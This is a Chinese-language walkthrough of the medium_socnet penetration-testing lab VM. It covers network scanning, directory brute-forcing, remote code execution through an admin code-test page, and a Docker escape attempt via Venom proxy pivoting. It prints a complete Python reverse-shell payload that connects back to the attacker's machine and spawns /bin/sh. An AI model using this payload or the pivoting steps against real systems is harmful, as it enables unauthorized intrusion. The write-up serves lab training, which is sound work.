medium_socnet
0x00前言
靶场要安装在virtualbox (最新版)。否者会出现一些问题。
攻击机:kali2024
靶机:medium_socnet
0x01信息搜集
因为把靶机和虚拟机啊放在了同一网段。
所以我先使用了 arp-scan,查看有多少同一网段ipUP 。
经过推断,发现 192.168.56.103是靶机IP。
接下来就可以对目标进行端口扫描,看看开放了那些端口。对版本服务也进行一个识别。
-p- 全端口扫描
nmap -p- 192.168.56.103
发现目标靶机开发了两个端口
经过发现 5000 有httpd,可能是一个网站并且是python语言搭建的。所以前去查看。
进入发现的确是一个网站。如下图
经过测试发现没有页面没有扫描东西。但是给了一个网站肯定有一些用处。
所以,可以尝试用dirsearch 进行目录扫描。
发现存在admin
发现这是一个测试代码的界面,所以可以尝试 rce 反弹shell.
0x01反弹shell
因为python搭建的要用python反弹shell.
import socket,os,subprocess
RHOST='192.168.56.105'
RPORT=4444
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) # 创建一个TCP-socket对象
s.connect((RHOST,RPORT)) # 连接攻击者
os.dup2(s.fileno(),0) # 复制链接符
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
kali监听端口
执行代码
查看是否成功,如下图即成功。
0x02怎么判断当前环境为docker 容器。
在查看目录下文件时发现Dockerfile,我们进到的环境可能是docker环境
查看根目录是否有此文件 .dockerenv
如果有 90% 是docker环境。
2.cat /proc/1/cgroup
如果文件如图,必是docker
0x03从docker环境到宿主机
发现靶机内网ip 为172.17.0.3 所以先尝试扫描当前网段IP。看看是否有存活的IP。
for i in $(seq 1 255);do ping -c 1 172.17.0.$i;done
经过发现
存活IP有 .1 .2. 3 .所以我们要对 .1 .2 进行扫描
0x04内网穿透
工具
https://github.com/Dliv3/Venom/releases
让在kali直接使用工具扫描内网。需要先把客户端发给靶机 agent_linux_x64
可以在目录下开启一个httpd服务。
靶机获取文件
kali先启动服务端
靶机启动,成功链接
、
进入节点设置代理端口通过代理端口访问目标主机。
修改配置文件设置代理端口
扫描
proxychains nmap -Pn -sT -p9200 -sV 172.17.0.2
可以在kali上搜索目标框架有没有漏洞。
使用代码。
可能是代码环境问题。我成功反弹shell之后命令一直报错。多次试验结果都一样。所以这篇文章暂时就到这里了。
查看文件 passwd文件
可以先用网上的MD5工具,解开
完整版的请观看下面一位大佬写的文章。
Medium_socnet渗透测试(含docker容器) - FreeBuf网络安全行业门户